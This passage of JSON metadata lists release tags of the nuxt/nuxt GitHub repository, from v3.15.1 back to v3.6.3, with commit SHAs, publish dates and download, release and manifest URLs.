.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.0